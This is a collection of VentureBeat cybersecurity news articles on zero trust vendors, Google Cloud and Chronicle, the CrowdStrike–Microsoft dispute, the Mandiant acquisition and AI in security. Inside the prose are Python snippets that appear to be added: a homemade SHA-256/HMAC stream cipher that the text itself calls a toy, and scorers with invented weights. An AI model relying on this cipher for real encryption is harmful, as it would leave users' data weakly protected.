any zero trust solution to scale and protect SMBs with the same level of security that enterprises achieve, security policy enforcement must occur at the edge, where users, devices, apps, and workloads interact.
Scalability also means the system must be transparent to users, so that users can focus on their jobs instead of trying to figure out security. Moreover, the system must be simple to activate, set policy, scale, and modify as an organization’s needs adapt to new circumstances. On top of that, scalability requires a fully integrated, no-cost identity access management (IAM) tool that works with any authentication provider. Factor 2: A proven track record To excel at delivering a zero trust solution, a cybersecurity vendor needs to provide one or more ways to gain real-time insights and visibility across all endpoint assets, devices, and data stores. Identifying and isolating rogue devices is also essential for protecting every endpoint. Evaluating potential zero trust vendors on this attribute will quickly separate out those with active R&D programs underway today that push the limits of their machine learning, AI, and related advanced analytics functions. Another reason this is a helpful benchmark is that it’s impossible to fake this functionality on a legacy cybersecurity platform or app that relies on interdomain or group-based controls. Zero trust vendors who double down on R&D spending around automating network discovery and optimizing workflows are setting a quick pace of innovation. Look for AI-based zero trust apps and platforms with customer references as a good evaluation criterion. Leaders in this area include Akamai, Forescout, Fortinet, and Ivanti. Automated network discovery workflows are an essential element of network access control platforms. The most advanced zero trust solutions in this area include user and entity behavior analytics (UEBA) anomaly detection, alert-based integration with third-party networks for OT threat detection and response, agentless profiling, and support for hosting on public cloud platforms, including Amazon AWS and Microsoft Azure.
Of the many competitors in this area of the zero trust market, the Ivanti Neurons hyperautomation platform shows the potential to deliver value for IT and operations technology (OT) reporting and deterrence. Factor 3: Protection of human and machine identities Machine identities (including bots, robots, and IoT) are growing twice as fast as human identities on organizational networks, according to Forrester’s recent Webinar, How To Secure And Govern Non-Human Identities. According to a Venafi study, machine identity attacks grew 400% between 2018 and 2019, increasing by over 700% between 2014 and 2019. These studies and the rapid rise in machine-to-machine breaches over the past 18 months make securing machine identities using a least-privileged-access approach a must for any organization. Vendors claiming to offer zero trust for machine identities need to be validated with customers currently running centralized IAM across all machines. Ideally, each customer needs to have IAM and privileged access management (PAM) operational at the machine level. Financial services, logistics, supply chain, and manufacturing companies that rely on real-time monitoring as a core part of how they operate daily need to prioritize this product feature of zero trust vendors. In financial services, machine identities and machine-to-machine interactions are growing faster than IT, and cybersecurity teams struggle to keep up. Leading zero trust security providers for machine identities, including bots, robots, and IoT, are BeyondTrust, ThycoticCentrify, CyberArk, and Ivanti. HashiCorp has proven its ability to protect DevOps cycles that are primarily machine-to-machine based. Factor 4: Simultaneous endpoint security and IT asset tracking Benchmarking zero trust vendors’ innovations — their ability to go beyond the basics of endpoint security and deliver more resilient, persistent, and self-healing endpoints — is an area to address.
Venture capital, early-stage investors, and private equity investors are all paying attention to self-healing endpoints, as their sales have the potential to outgrow the broader cybersecurity market. Absolute Software’s recent announcement of its intent to acquire NetMotion is one of several transactions in process. Absolute is one of the few companies publicly disclosing their acquisition plans this year. Organizations need more automated approaches to identifying endpoints that need self-healing apps, security clients or agents, firmware, and operating systems. Every organization could use greater visibility and control across IT and OT systems. Leading zero trust vendors will have references proving they can deliver IT and OT insights. In addition, endpoint detection and response (EDR) vendors continue to prioritize integrations with as diverse a base of IAM systems, log systems, zero trust mobile platforms, and anti-phishing email systems as possible. What’s fascinating about this aspect of cybersecurity product development is how varied the approaches are for solving this challenge, as reflected in the recent VentureBeat story on addressing endpoint security hype. Evaluation in this case is far from simple. As Absolute CTO Nicko van Someren, who has designed, developed, and implemented self-healing endpoints, noted, there is a wide gap between what’s not known about zero trust on endpoint devices and what is known. His advice: “When evaluating zero trust endpoint solutions, focus on the questions that force vendors to think through where their gaps are and what they’re doing to close them.” Moreover, van Someren said, anyone evaluating endpoint solutions can help drive more innovation by using a more Socratic approach — one that constantly questions what one doesn’t know.
Factor 5: Enforcement of zero trust across DevOps, SDLC Zero trust vendors vary significantly on how effective they are in protecting privileged access credentials across an entire software development life cycle (SDLC). This has become more evident in the wake of the SolarWinds breach, which showed how vulnerable DevOps teams are to sophisticated, patiently executed hack attempts by bad actors. Ensuring security and DevOps are on the same development platform is itself a challenge. Closing those gaps is one of the most effective approaches to streamlining product development times and delivering a higher quality code base that meets periodic security audit requirements. Vendors claiming to support zero trust down to the SDLC and CI/CD process level need to show how their APIs can scale and adapt to rapidly changing software, configuration, and DevOps requirements. Leading zero trust vendors in this market area include Checkmarx, Qualys, Rapid7, Synopsys, and Veracode. Factor 6: Deep expertise in baseline requirements Leading zero trust vendors continue to invest R&D resources that span a broad spectrum of core authentication technologies. They range from technologies focused entirely on eliminating passwords to those streamlining authentication with greater context and intelligence. Vendors should go beyond MFA and microsegmentation, as these are the baseline requirements to compete in zero trust opportunities. Look for deep expertise in adaptive authentication and support for context and user role as verification factors in the most advanced zero trust vendors in this area. The rapid growth of virtual teams is accelerating this requirement. To secure remote workers’ identities and endpoints requires zero trust, automating as many tasks related to authentication as possible to streamline the experience.
Of the many zero trust-based innovations in authentication today, Ivanti’s Zero Sign-On (ZSO), now a core part of the platform following the acquisition of MobileIron, relies on proven biometrics, including Apple’s Face ID, as a secondary authentication factor to gain access to work email, unified communications and collaboration tools, and corporate-shared databases and resources. An acid test for whether a password alternative is effective is how well it can extend mobile threat defense to the network, device, and identity level. Among innovative approaches to authentication is the Ericom Software Automated Policy Builder, which learns how a zero trust policy needs to be applied to a user, an application, or both, with no input from administrators required. Factor 7: Encryption algorithms to protect data throughout all processes Evaluating zero trust vendors on whether, and how well, they can enable native OS encryption mechanisms is also a practical approach to separating vendors selling hype from those delivering results. Just as Zoom upgraded its security to 256-bit AES with GCM (Galois/Counter Mode) in 2020, evaluating zero trust vendors on their support for this standard will help prioritize the most experienced zero trust vendors under consideration. GCM is designed for high-performance data streaming over block transfers, which scales well across virtual teams that rely primarily on web conference calling apps to communicate. GCM also authenticates what it encrypts, further supporting a zero trust security architecture. The more advanced zero trust vendors will also support Transport Layer Security (TLS) 1.2 cipher suites for protecting data in transit across the open internet. Trust is the major key Overall, the seven factors provided here are meant as a roadmap to help guide organizations in selecting zero trust vendors that can scale and support rapidly changing business initiatives.
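Factor 7 turns on GCM's defining property: it authenticates what it encrypts, so tampered ciphertext fails at decrypt time instead of silently yielding garbage. Python's standard library has no AES-GCM, so this sketch substitutes a toy encrypt-then-MAC construction (a SHA-256-derived keystream plus an HMAC tag) purely to demonstrate that property; it is not AES-GCM and not production cryptography:

```python
import hashlib
import hmac
import os

def _keystream(key, nonce, length):
    """Derive a pseudo-random keystream by hashing key+nonce+counter (toy stream cipher)."""
    out = b""
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce + counter.to_bytes(8, "big")).digest()
        counter += 1
    return out[:length]

def seal(key, nonce, plaintext):
    """Encrypt then MAC, mimicking GCM's authenticate-what-you-encrypt behavior."""
    ct = bytes(p ^ k for p, k in zip(plaintext, _keystream(key, nonce, len(plaintext))))
    tag = hmac.new(key, nonce + ct, hashlib.sha256).digest()
    return ct + tag

def open_sealed(key, nonce, blob):
    """Verify the tag before decrypting; any modification raises instead of decrypting."""
    ct, tag = blob[:-32], blob[-32:]
    if not hmac.compare_digest(tag, hmac.new(key, nonce + ct, hashlib.sha256).digest()):
        raise ValueError("authentication failed: ciphertext was modified")
    return bytes(c ^ k for c, k in zip(ct, _keystream(key, nonce, len(ct))))

key, nonce = os.urandom(32), os.urandom(12)
blob = seal(key, nonce, b"zero trust payload")
assert open_sealed(key, nonce, blob) == b"zero trust payload"
```

Flipping a single ciphertext bit makes `open_sealed` raise, which is the behavior that lets a zero trust architecture treat undetected tampering as impossible rather than merely unlikely.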
In evaluating frameworks, it is key to understand how competitive a given vendor is in the fastest-changing areas of zero trust. These include IAM and PAM to the machine identity level, as well as new machine-to-machine zero trust implementations. A track record of continual innovation in passwordless and advanced authentication technologies and the constant development of encryption algorithms are good benchmarks to apply to any zero trust vendor that an organization might look to confidently engage. VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. © 2023 VentureBeat. All rights reserved. "
15097
2021
"Google Cloud targets Biden's zero trust order with new services | VentureBeat"
"https://venturebeat.com/2021/07/20/google-cloud-targets-bidens-zero-trust-order-with-new-services"
"Google Cloud targets Biden’s zero trust order with new services [Image: The United States Capitol Building in Washington D.C.] In addition to a suite of new security tools and services, Google Cloud today unveiled new offerings aimed at helping government organizations accelerate their implementation of zero trust architecture. Announced at the company’s Government Security Summit, the offerings include a planning tool, threat detection services, and a container-based solution for secure application access and monitoring. Mike Daniels, VP of global public sector for Google Cloud, kicked off a news conference about the announcements by reflecting on Google’s own journey to zero trust. “It started 10 years ago when we realized our systems were compromised by a nation-state actor,” he said.
“We knew where they were, and we knew that we needed to change the way we approach security, kind of from the ground up.” Now, these new offerings come on the back of a global uptick in cyberattacks by nation-state actors and a mandate from the White House to start migrating the government to zero trust security. In May, President Biden issued an executive order and gave all government agency heads 60 days to develop a plan to implement the architecture. Zero Trust Assessment and Planning To kick things off, Google Cloud announced a new service aimed at helping government agencies navigate step one. The Zero Trust Assessment and Planning offering consists of assessments, workshops, and strategy development, and it entails Google Cloud’s professional services organization (PSO) directly advising government organizations. “Zero trust is something that everyone wants to get to but no one knows where to begin,” Daniels said. “That ‘how’ step is incredibly important, and it’s different for each one of our government organizations based on the IP landscape they have and what are the most pressing threats.” The company says the advising will be done in phases and will address both core applications and data. The culture changes, policies, and technologies needed to achieve a zero trust framework are all part of the curriculum, and Google Cloud will help with the transition for existing assets and infrastructure in cloud-based, on-premises, and hybrid environments. Secure Application Access Anywhere Google Cloud also announced Secure Application Access Anywhere, a container-based offering for secure application access and monitoring. Leveraging Google Cloud’s Anthos, it’s intended to deploy and manage containers that provide secure access and monitoring for applications in cloud or on-premises environments.
The offering is being delivered in partnership with Palo Alto Networks and Google Cloud’s PSO team, and the company says it can serve as a “scalable, highly responsive alternative to government network boundary systems.” Already, Google Cloud tested Secure Application Access Anywhere with the Defense Innovation Unit (DIU), an organization within the Department of Defense. Google Cloud reports the prototype of this solution helped accelerate DIU’s zero trust journey, specifically in regard to accessing software-as-a-service (SaaS) apps directly over the internet. Daniels said the pilot started before the pandemic, but that “the timing was absolutely spot on.” “They were exploring alternatives to this CAP system with respect to access, and we completed that prototype with a success letter from the DIU just recently,” he said. “So [it’s] a great offering, and I think extraordinarily timely for our government customers.” Active Cyber Threat Detection Rounding out the announcements is a new service called Active Cyber Threat Detection. Delivered through a partner, Fishtech Cyderes, Google Cloud says it can help government organizations quickly determine if they may have been compromised by cyberattacks that they have not yet detected. Steeped in threat hunting and detection, the service also leverages the capabilities of Google Cloud’s Chronicle. What’s more, both historic and current log data can be analyzed to detect threats.
"
15098
2021
"CrowdStrike survey says Microsoft customers 'losing trust'; Microsoft calls report 'self-serving' | VentureBeat"
"https://venturebeat.com/2021/12/07/crowdstrike-survey-microsoft-customers-losing-trust-microsoft-calls-report-self-serving"
"CrowdStrike survey says Microsoft customers ‘losing trust’; Microsoft calls report ‘self-serving’ A new survey commissioned by cybersecurity firm CrowdStrike uncovered disturbing trends when it comes to ransomware breaches, supply chain attacks, and incident detection times — while the company says the survey also found an erosion of trust in “legacy” vendors including Microsoft. In response, Microsoft provided a statement to VentureBeat characterizing the CrowdStrike report as “self-serving market research” and an attack on the company. Microsoft said it is actively “protecting both our customers and the wider industry,” including through such efforts as disrupting the activities of state-sponsored attackers.
Along with inflaming the running dispute between the two competing security industry titans, the CrowdStrike-commissioned survey released today also pointed to a number of worsening issues within the cybersecurity space. According to the survey, organizations have gotten much slower at detecting cyber incidents in 2021, especially in the U.S. Meanwhile, supply chain attacks have now affected more than three-fourths of businesses, the survey found. And on ransomware, more than half of businesses said they actually don’t have a “comprehensive” strategy to defend against ransomware attacks — even as the breaches have increased and ransom payments have surged in 2021. A backdrop to these issues is that vulnerabilities associated with “legacy” vendors such as Microsoft are on the rise, said Michael Sentonas, CrowdStrike’s chief technology officer, in an interview with VentureBeat. “People are just getting exhausted from having to constantly run to patch. And their problem is getting worse,” Sentonas said. ‘Losing trust’? The report — the 2021 CrowdStrike Global Security Attitude Survey — was conducted in recent months by research firm Vanson Bourne, and surveyed 2,200 senior IT decision makers and IT security professionals. It’s the fourth such survey commissioned by CrowdStrike, but the first to specifically mention Microsoft — a rival firm that has ramped up its security efforts substantially in recent years. The past year has seen CrowdStrike and Microsoft increasingly battling for customers, and top CrowdStrike executives including CEO George Kurtz have brought a series of criticisms against Microsoft on security. In the new survey from CrowdStrike, one question asked respondents about their view of “legacy” vendors including Microsoft. In response, 63% of respondents said they’re “losing trust” in such vendors, according to CrowdStrike.
Microsoft was the only vendor mentioned by name in the survey question. The finding “clearly demonstrates the need for a holistic approach when it comes to defending against software supply chain attacks,” the CrowdStrike report said. “Technology giants such as Microsoft are not immune to this form of cyberattack, and rather they are the gateway onto the network for millions of organizations around the globe. If they do not hold themselves accountable, then many others could suffer.” ‘Self-serving’ research? In a response to CrowdStrike’s report and Sentonas’ comments, Microsoft said in a statement to VentureBeat that “this week we announced the result of a sustained effort to proactively take down nation-state attack infrastructure, protecting both our customers and the wider industry.” The statement referred to Microsoft’s disclosure Monday that its Digital Crimes Unit had removed important infrastructure used by a hacking group based in China. “We believe this is more valuable to our customers than self-serving market research that attacks other security vendors,” Microsoft said in the statement provided to VentureBeat. Microsoft also said that its platforms and security teams prevented more than 70 billion cyber attacks during the past year, helping to protect its nearly 650,000 security customers. In a June response to previous accusations from CrowdStrike, Microsoft’s corporate vice president of communications, Frank Shaw, said on LinkedIn that the company believes security is a “team sport,” and that “fellow defenders must work together to make the world a safer place.” Supply chain and ransomware attacks In terms of supply chain security, the CrowdStrike survey found that 77% of organizations have now experienced a supply chain attack. And nearly half — 45% — had suffered a supply chain attack during the previous 12 months. 
In the area of ransomware, a number of findings in the survey point to worsening trends:
- 66% of respondents said their organization had experienced a ransomware attack in the previous 12 months, up from 56% in the 2020 report
- 33% of respondents acknowledged they’ve suffered multiple ransomware attacks during the past 12 months, up from 24% in the 2020 report
- The average ransomware payment surged by about 63% in 2021, reaching $1.79 million, up from $1.1 million in 2020
- Nearly all companies who paid a ransom (96%) were forced to pay additional extortion fees on top of the initial ransom payment
Perhaps most alarmingly, 57% of respondents said their business “did not have a comprehensive ransomware defense strategy in place,” CrowdStrike said. Slower response times Another troubling finding in the survey is that worldwide, organizations now report an average of 146 hours before a cyber incident is even detected. That’s up significantly from 2020, when the survey found an average of 117 hours for incident detection. The situation is even worse in the U.S., according to the CrowdStrike report. U.S. organizations reported an average of 165 hours before a cyber incident was detected — up from 97 hours in 2020. Sentonas said there’s no question that when it comes to cyber incident detection, “this isn’t easy.” “There are so many adversaries. There are so many attacks. The infrastructure that we use is very complex. And here we are, nearly two years into a global pandemic, and security professionals are working from home and trying to manage remote organizations. You put it all together, and it’s not easy. And I don’t want to suggest in any way that it is,” he said. “But the challenge here is that when we look at some of these statistics, they are getting worse. And U.S. organizations are worse at detection compared to the rest of the world.” Possible reasons for that may be that U.S.
organizations often have larger networks than companies globally, and may have a larger proportion of users that are continuing to work from home, according to Sentonas. Sixty-nine percent of respondents in the survey attributed a cyber incident in their organization to having staff that was working remotely. Still, the average time for detection “needs to come back the other way,” Sentonas said. “You need to be able to accelerate your detection time.” Growing vulnerabilities The survey decided to focus more on “legacy” vendors such as Microsoft this year in part because of how Microsoft has been implicated in major cyber incidents over the past year, such as the SolarWinds supply chain breach, according to Sentonas. Additionally, the number of vulnerabilities reported by Microsoft for its various platforms has seen a “staggering” increase in recent years, he said. A report from BeyondTrust found a 181% increase in Microsoft vulnerabilities between 2016 and 2020 — and a 48% increase in 2020 alone from the year before. A total of 1,268 Microsoft vulnerabilities were discovered in 2020, according to the report. CrowdStrike’s survey contends that due to this frequency of vulnerability issues, paired with high-profile incidents such as SolarWinds, there is a “crisis of trust in legacy IT vendors, such as Microsoft.” Similar phrasing had previously been used by CrowdStrike CEO Kurtz in discussing Microsoft. During CrowdStrike’s quarterly investor call in March, Kurtz said that there is a “crisis of trust within the Microsoft customer base” in the wake of the SolarWinds attack and the Microsoft Exchange zero day vulnerabilities that were revealed that same month. ‘Weaknesses’ exploited The SolarWinds incident involved malicious code inserted into the software supply chain for the company’s Orion network monitoring solution, which was then distributed to thousands of customers, including numerous federal agencies.
However, a “significant” number of customers that were affected in connection with the attack weren’t actually SolarWinds customers, Sentonas noted. “What we saw was the threat actor in this particular case took advantage of weaknesses in [Microsoft’s] Windows authentication architecture. They were able to get in and then start to move laterally throughout the organization,” he told VentureBeat. “This was because of issues having to do with the authentication architecture around [Microsoft’s] Active Directory and Azure Active Directory, and the way it is configured.” Another CrowdStrike executive who has criticized Microsoft on security in the past is James Yeager, the company’s vice president of public sector, who wrote in a LinkedIn post in June that Microsoft is “incapable” of protecting even its own infrastructure. Shaw’s LinkedIn post was a response to this post from Yeager. In the post, Shaw wrote that “we fundamentally believe that security is a team sport and fellow defenders must work together to make the world a safer place.” “It’s unfortunate to see some vendors attempt to further their position via innuendo and inaccurate accusations rather than seeking ways to contribute collaboratively,” Shaw wrote in the post. “Every day Microsoft handles authentication for more than 425 million users and delivers protection with 2.5 billion detections blocking 6 billion threats annually — all while contributing massive amounts of data to the defender community. That’s the definition of a trusted and proven security leader, by any measure.” Tools and expertise Altogether, the issues of worsening attacks and response times partly relate to the security tools in use by companies — but it’s potentially even more important to focus on the “tradecraft” that adversaries are using, Sentonas said. A recent report from CrowdStrike’s Falcon OverWatch threat hunting team found that nearly 70% of the intrusions that were investigated did not use any malware at all, he noted. 
“So if your strategy is to go and get the best anti-malware capabilities, and 70% of the time the adversary is not using malware — well, what then?” Sentonas said. “That’s why we say, you need to have the right tools — but you also need to understand the right tradecraft.” In other words, “you need to know what to look for,” he said. “How are the adversaries actually getting on the network? What techniques are they using to try to get inside? And once they’re inside, how do they move laterally?” Accomplishing this is partly about having the right instrumentation — which provides the telemetry to see what attackers are doing, according to Sentonas. But the other part is having the ability to spot the indicators of compromise, he said. “And if you don’t,” Sentonas said, “then you need to work with an organization that has the ability to do that for you.” "
15099
2022
"Google to acquire cybersecurity company Mandiant for $5.4B | VentureBeat"
"https://venturebeat.com/2022/03/08/google-to-acquire-cybersecurity-company-mandiant-for-5-4b"
"Google to acquire cybersecurity company Mandiant for $5.4B Google has confirmed plans to acquire cybersecurity company Mandiant in an all-cash deal worth $5.4 billion, after rumors first emerged yesterday of an impending deal. The move comes exactly a month after reports emerged that Microsoft was in early discussions to buy Mandiant, meaning that Google is essentially getting one over its big cloud rival. Mandiant works with customers including InfoSys, OlyFed, and the Bank of Thailand, providing threat intelligence and consulting services, and automated tools for investigating security alerts. Mandiant is perhaps better known under its former name FireEye, a U.S. cybersecurity firm that shot to prominence for detecting major cyberattacks through the years.
FireEye had acquired Mandiant for $1 billion in 2013, but last year it revealed plans to sell off the FireEye brand and products business and focus on its Mandiant cyber forensics business instead. As part of the transaction, FireEye changed its corporate name to Mandiant. ‘Unprecedented cybersecurity challenges’ From Google’s perspective, buying Mandiant makes a great deal of sense, given its clear interest in bolstering its cloud platform and selling its wares to enterprises the world over. As a result of the transaction, Mandiant will become part of Google Cloud, where it will offer advisory services to help companies reduce risk before, during, and after security incidents; power additional threat detection, intelligence, and automated incident response tools; and more. “Organizations around the world are facing unprecedented cybersecurity challenges as the sophistication and severity of attacks that were previously used to target major governments are now being used to target companies in every industry,” Google Cloud CEO Thomas Kurian said in a press release. “We look forward to welcoming Mandiant to Google Cloud to further enhance our security operations suite and advisory services, and help customers address their most important security challenges.” Google said that it expects to close the Mandiant acquisition later this year, pending the usual regulatory and shareholder approvals.
"
15100
2022
"Google Chronicle adds 'context-aware' cyber threat detection | VentureBeat"
"https://venturebeat.com/2022/03/15/google-chronicle-adds-context-aware-cyber-threat-detection"
"Google Chronicle adds ‘context-aware’ cyber threat detection Google Cloud today announced the next series of updates to its Chronicle security platform, aimed at helping to enhance security operations with improved detection of threats. The updates introduce “context-aware” threat detection to Chronicle, a capability that is available now as a public preview. The capability shows that Google is “creating efficiencies in every step of a customer’s detection and response journey, starting by making alerts more actionable,” members of the Google Chronicle team said in a blog post today. The unveiling of the new capability follows Google’s announcements of two major acquisitions in security that will be tied in with Chronicle. In January, Google acquired Siemplify, a provider of security orchestration, automation and response (SOAR) technologies.
And earlier this month, the company announced an agreement to acquire cybersecurity powerhouse Mandiant for $5.4 billion, which is poised to bring a range of capabilities to the Google Cloud security platform including threat intelligence, incident response and managed defense. Google Cloud is ultimately aiming to deliver an “end-to-end security operations suite to help enterprises stay protected at every stage of the security lifecycle,” said Phil Venables, CISO at Google Cloud, during a news conference last week. Improving threat response With today’s announcement, Google is acknowledging that customers need “access to all context across their entire IT stack while responding to malicious threats,” to help with forming a strategy around threat response, the Chronicle team said in a blog post. The post also notes that “alert fatigue” has afflicted many security teams, with an overload of alerts coming in from security tools that limits their ability to prioritize the threats that really matter most. This is where “context-aware” detections come in for Google Chronicle. With the new feature, “all the supporting information from authoritative sources (e.g., CMDB, IAM, and DLP) including telemetry, context, relationships, and vulnerabilities are available out of the box as a ‘single’ detection event,” the Chronicle team said. Key capabilities include the ability to use risk scoring to prioritize threats, respond to alerts more quickly, and get higher-fidelity alerts, according to the post. The Chronicle team noted that security information and event management (SIEM) tools and other security analytics to date have struggled to provide this sort of functionality to customers.
“This launch fixes a paradigm gap in legacy analytics and SIEM products, where data has historically been logically separated due to prohibitive economics,” the team said in the blog post. “Customers can now operationalize all their security telemetry and enriching data sources in one place, giving them the ability to develop flexible alerting and prioritization strategies.” Faster response times All in all, response and recovery times will be accelerated “by minimizing the need to wait for contextual understanding before making a decision and taking an investigatory action,” Google Chronicle’s team said in the post. Google did not specifically say when context-aware threat detection in Chronicle will be generally available. The Chronicle team did say, however, that “over the next months as we move these modules towards general availability, you can expect to see a steady release of new detection capabilities and integrations with other parts of Google Cloud and additional third party providers.” Other recent updates from Google Cloud in security have included the addition of detection for cryptocurrency mining in virtual machines and the debut of Cloud IDS, a cloud-native network security offering that aims to provide simplified deployment and use. Notably, Chronicle and Siemplify are all about “interoperability between a ton of other technologies — [they] work with every firewall company, work with all the endpoint companies, work with logs generated from different applications,” Mandiant CEO Kevin Mandia said in a news conference last week.
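To make "context-aware" prioritization concrete, here is a toy scorer; the field names, weights, and thresholds are invented for illustration and are not Chronicle's actual model. It folds contextual signals (asset criticality from a CMDB, user privilege from IAM, open vulnerabilities from a scanner) into an alert's base severity, then ranks alerts so higher-risk ones surface first:

```python
# Toy "context-aware" alert scorer. All field names and weights are
# invented for this sketch; they are not taken from Chronicle.
BASE_SEVERITY = {"low": 10, "medium": 40, "high": 70, "critical": 90}

def risk_score(alert, context):
    """Combine an alert's raw severity with asset context, capped at 100."""
    score = BASE_SEVERITY[alert["severity"]]
    if context.get("asset_criticality") == "crown_jewel":   # e.g., from a CMDB
        score += 20
    if context.get("user_is_privileged"):                    # e.g., from IAM
        score += 10
    score += 5 * len(context.get("open_vulnerabilities", []))  # e.g., from a scanner
    return min(score, 100)

def prioritize(alerts_with_context):
    """Sort (alert, context) pairs so the highest-risk alerts surface first."""
    return sorted(alerts_with_context,
                  key=lambda ac: risk_score(*ac), reverse=True)

alerts = [
    ({"id": 1, "severity": "high"}, {}),
    ({"id": 2, "severity": "medium"},
     {"asset_criticality": "crown_jewel", "user_is_privileged": True,
      "open_vulnerabilities": ["CVE-2021-44228"]}),
]
ranked = prioritize(alerts)
print([a["id"] for a, _ in ranked])  # -> [2, 1]
```

Note how the medium-severity alert outranks the high-severity one once context is applied: that reordering is the point of context-aware detection, and it is exactly what a severity-only SIEM view cannot do.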
VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,101
2,022
"5 ways AI and ML will improve cybersecurity in 2022 | VentureBeat"
"https://venturebeat.com/2022/01/19/5-ways-ai-and-ml-will-improve-cybersecurity-in-2022"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages 5 ways AI and ML will improve cybersecurity in 2022 Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. Cyberattacks are happening faster, targeting multiple threat surfaces simultaneously using a broad range of techniques to evade detection and access valuable data. A favorite attack strategy of bad actors is to use various social engineering, phishing, ransomware , and malware techniques to gain privileged access credentials to bypass Identity Access Management (IAM) and Privileged Access Management (PAM) systems. Once in a corporate network, bad actors move laterally across an organization, searching for the most valuable data to exfiltrate, sell, or use to impersonate senior executives. IBM found that it takes an average of 287 days to identify and contain a data breach, at an average cost of $3.61M in a hybrid cloud environment. And when ransomware is the attack strategy, the average cost of a data breach skyrockets to $4.62M. 
Using AI to anticipate and lure attacks

A perfect use case for AI and machine learning (ML) is deciphering the millions of concurrent data connections a typical enterprise has with the outside world at any given minute. Training supervised machine learning algorithms with data streams helps them identify potential anomalies, even before the algorithm understands what the definition of an anomaly is, according to Boston Consulting Group. Using AI and ML to lure attackers into simulated environments to analyze their attack strategies, components, and code needs to start at the transaction level. Transaction fraud detection is one of five core areas where AI and ML can improve cybersecurity this year. Additionally, malware detection and user and machine behavioral analysis are among the top five use cases delivering the most value based on their use of AI and ML this year. Another report by Boston Consulting Group compares AI use cases in cybersecurity by complexity and benefit. Cybersecurity vendors whose platforms are in the “high benefits, high complexity” quadrant are the best equipped to use AI and ML to lure attackers into simulated honeypots and reverse engineer their payloads, often down to the executable file level.

Above: AI’s contributions to cybersecurity are differentiated by Operational Technology (OT), IoT, and IT use cases, with each sharing the same attribute of using machine learning to identify anomalies in transaction and operations data and then assign risk scores.

How AI will improve cybersecurity in 2022

CISOs tell VentureBeat that the AI and ML use cases in which they see the greatest payoff are pragmatic and driven by the need to reduce the overwhelming workload their analysts face daily. While the apps and platforms each have advanced analytics and detailed modeling, the full feature set rarely gets used.
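As a toy illustration of the stream-trained anomaly detection described above: a simple z-score baseline stands in for the production ML models, and the traffic values are invented:

```python
import statistics

class StreamAnomalyDetector:
    """Learns the normal range of a metric from a stream of
    observations, then flags values that deviate sharply."""

    def __init__(self, threshold=3.0):
        self.history = []
        self.threshold = threshold  # std-devs of deviation counted as anomalous

    def observe(self, value):
        """Feed one observation from the data stream into the baseline."""
        self.history.append(value)

    def is_anomaly(self, value):
        """Flag a value that sits far outside the learned baseline."""
        if len(self.history) < 2:
            return False                       # not enough data to judge yet
        mean = statistics.mean(self.history)
        stdev = statistics.pstdev(self.history) or 1e-9
        return abs(value - mean) / stdev > self.threshold
```

A value is flagged only once it sits several standard deviations outside the range the detector has learned from the stream, which mirrors how the platforms above learn "normal" before knowing what an anomaly is.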
Enterprises see AI and ML cybersecurity-based systems as relief for their overwhelmed staff. Fifty-six percent of executives say their cybersecurity analysts are overwhelmed, according to BCG. When CISOs take a more pragmatic view of AI and ML’s potential contributions to their operations, they often focus on better protecting machine-based transactions. It’s the machine-based transaction attacks that most concern CISOs and their teams because they’re so quick and difficult to identify, predict, and stop. BCG found that 43% of executives see an increase in machine-speed attacks. With seven out of every 10 executives believing they can’t respond to or thwart advanced cyberattacks without AI, demand for AI and ML-based cybersecurity systems in the following five core areas continues to grow.

1. Transaction fraud detection – CISOs tell VentureBeat that the pandemic’s effects on their ecommerce sales are the primary catalyst for investing in AI and ML-based transaction fraud detection. Transaction fraud detection is designed to provide real-time monitoring of payment transactions, using ML techniques to identify anomalies and potential fraud attempts. In addition, ML algorithms are being trained to identify login processes and prevent account takeovers (ATOs), one of the fastest-growing areas of online retail fraud today. Leading online retailers are training their cybersecurity analysts on transaction fraud detection systems and having their data scientists work with vendors to spot identity spoofing and the use of stolen privileged access credentials. Identifying behaviors that don’t fit the legitimate account holder is also helping to stop impersonation and stolen-credential attacks. Fraud detection and identity spoofing are converging as CISOs and CIOs want a single AI-based platform to scale and protect all transactions. Equifax acquired Kount in 2021 to expand its digital identity and fraud prevention solutions footprint.
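A minimal sketch of the kind of real-time checks such monitoring applies to a payment; the thresholds, field names, and signals are illustrative assumptions, not any vendor's rules:

```python
from datetime import datetime, timedelta

def fraud_signals(txn, recent_txns, profile):
    """Collect simple fraud indicators for one payment transaction.
    Thresholds are illustrative; real systems learn them from data."""
    signals = []
    if txn["amount"] > 5 * profile["avg_amount"]:
        signals.append("unusual_amount")        # far above this buyer's norm
    if txn["country"] != profile["home_country"]:
        signals.append("foreign_country")
    window = txn["time"] - timedelta(minutes=10)
    burst = [t for t in recent_txns if t["time"] >= window]
    if len(burst) >= 5:
        signals.append("velocity_burst")        # many payments within minutes
    return signals

def should_review(txn, recent_txns, profile):
    """Escalate the transaction when multiple weak signals agree."""
    return len(fraud_signals(txn, recent_txns, profile)) >= 2
```

Production systems score hundreds of learned features rather than three hand-written rules, but the structure of combining weak signals into a review decision is the same.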
Leading vendors include Accertify, Akamai, Arkose Labs, BAE Systems Cybersource, IBM, LexisNexis Risk Solutions, Microsoft, NICE Actimize, and several others.

